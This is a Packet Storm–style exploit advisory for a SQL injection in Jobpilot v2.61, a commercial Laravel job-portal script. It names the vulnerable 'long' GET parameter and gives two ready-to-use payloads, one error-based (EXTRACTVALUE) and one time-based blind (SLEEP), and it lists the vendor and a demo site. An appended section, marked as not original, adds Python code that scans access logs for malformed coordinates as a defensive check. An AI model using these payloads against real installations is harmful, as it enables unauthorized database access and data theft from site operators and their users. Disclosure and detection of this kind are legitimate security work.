Jobpilot 2.61 SQL Injection

Jobpilot version 2.61 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql #vulnerability #linux #auth
# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Parameter: long (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT(ELT(4894=4894,1))),0x71786b7171)) AND(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=
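
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web-server access logs for `lat`/`long` values that are not plain in-range decimals or that arrive more than once, the two traits both PoC requests share. The log lines, the `/jobs` path, the treatment of empty coordinates and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Largest absolute value a coordinate parameter may legitimately carry.
COORD_LIMIT = {"lat": 90.0, "long": 180.0}
DECIMAL = re.compile(r"[+-]?\d{1,3}(\.\d+)?")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def coordinate_findings(target):
    """Return reasons why the lat/long parameters of a request target are suspect."""
    findings, counts = [], {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in COORD_LIMIT:
            continue
        counts[name] = counts.get(name, 0) + 1
        if value == "":
            continue  # assumption: an empty coordinate means "no location filter"
        if not DECIMAL.fullmatch(value):
            findings.append(f"{name}: value is not a plain decimal")
        elif abs(float(value)) > COORD_LIMIT[name]:
            findings.append(f"{name}: value outside +/-{COORD_LIMIT[name]:g}")
    # A coordinate sent twice lets different layers read different values.
    findings += [f"{n}: sent {c} times" for n, c in counts.items() if c > 1]
    return findings

def scan(log_lines):
    """Yield (line_number, findings) for each logged request with suspect coordinates."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            findings = coordinate_findings(match.group(1))
            if findings:
                yield number, findings

# Constructed access-log lines (documentation IP address, hypothetical /jobs path).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Jun/2023:10:00:01 +0000] "GET /jobs?keyword=1&lat=34.0536909&long=-118.242766&category= HTTP/1.1" 200 5120',
    '203.0.113.7 - - [17/Jun/2023:10:00:09 +0000] "GET /jobs?keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND(1913%3D1913 HTTP/1.1" 500 312',
    '203.0.113.7 - - [17/Jun/2023:10:00:15 +0000] "GET /jobs?keyword=1&lat=340.5&long=-118.242766 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same two rules (strict decimal format with a range check, and rejection of repeated parameters) also work as server-side input validation ahead of a parameterized query.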
